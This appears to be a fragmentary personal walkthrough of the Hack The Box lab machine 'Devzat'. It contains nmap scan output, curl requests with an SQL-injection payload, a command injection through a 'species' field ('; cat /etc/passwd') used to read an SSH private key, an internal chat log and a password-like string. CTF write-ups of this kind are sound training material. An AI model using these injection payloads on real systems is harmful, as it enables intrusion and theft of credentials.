Machine - Devzat - active - medium
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
8000/tcp open http-alt syn-ack ttl 63
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c2:5f:fb:de:32:ff:44:bf:08:f5:ca:49:d4:42:1a:06 (RSA)
| 256 bc:cd:e8:ee:0a:a9:15:76:52:bc:19:a4:a3:b2:ba:ff (ECDSA)
|_ 256 62:ef:72:52:4f:19:53:8b:f2:9b:be:46:88:4b:c3:d0 (ED25519)
80/tcp open http Apache httpd 2.4.41
|_http-title: Did not follow redirect to http://devzat.htb/
|_http-server-header: Apache/2.4.41 (Ubuntu)
8000/tcp open ssh (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-Go
| ssh-hostkey:
|_ 3072 6a:ee:db:90:a6:10:30:9f:94:ff:bf:61:95:2a:20:63 (RSA)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8000-TCP:V=7.92%I=7%D=11/3%Time=6182EB1F%P=x86_64-pc-linux-gnu%r(NU
SF:LL,C,"SSH-2\.0-Go\r\n");
Service Info: Host: devzat.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
fuzz on :80
fuzz on vhost
- pets.devzat.htb
< Server: My genious go pet server
curl 'http://pets.devzat.htb/api/pet' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:93.0) Gecko/20100101 Firefox/93.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: http://pets.devzat.htb/aaa' -H 'Content-Type: text/plain;charset=UTF-8' -H 'Origin: http://pets.devzat.htb' -H 'Connection: keep-alive' --data-raw '{"name":"ddd","species":"giraffe"}'
- tried simple sql injection and the insert has changed…
curl 'http://pets.devzat.htb/api/pet' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:93.0) Gecko/20100101 Firefox/93.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: http://pets.devzat.htb/aaa' -H 'Content-Type: text/plain;charset=UTF-8' -H 'Origin: http://pets.devzat.htb' -H 'Connection: keep-alive' --data-raw $'{"name":"something\' or 1=1 -- -"}'
with the species parameter, we can read files by ; cat /etc/passwd
we can read the .ssh/id_rsa :) YEEEY
explore
ssh -l [username] devzat.htb -p 8000
the page has an email patric@devzat.htb
patrick to…
we can not read yeat the catherine :(
sudo -l ⇒ I don’t have the password…
suid → nothing int
in the chat app I see the following “chats”
admin: Connection to localhost closed.
patrick@devzat:~$ ssh -l catherine localhost -p 8000
patrick: Hey Catherine, glad you came.
catherine: Hey bud, what are you up to?
patrick: Remember the cool new feature we talked about the other day?
catherine: Sure
patrick: I implemented it. If you want to check it out you could connect to the local dev instance on port 8443.
catherine: Kinda busy right now 👔
patrick: That's perfectly fine 👍 You'll need a password I gave you last time.
catherine: k
patrick: I left the source for your review in backups.
catherine: Fine. As soon as the boss let me off the leash I will check it out.
patrick: Cool. I am very curious what you think of it. See ya!
devbot: patrick has left the chat
admin: Hey patrick, you there?
patrick: Sure, shoot boss!
admin: So I setup the influxdb for you as we discussed earlier in business meeting.
patrick: Cool 👍
admin: Be sure to check it out and see if it works for you, will ya?
tcp 0 0 127.0.0.1:8443 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:5000 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:8086 0.0.0.0:* LISTEN
8443 → is another go ssh (in localhost) 8086 → influx
if we connect to the ssh, we see a chat, but there is a new commands /file but you need a password the backup is only readable by catherine.
I think there should be some kind of “pista” in the influx db “CeilingCatStillAThingIn2021?”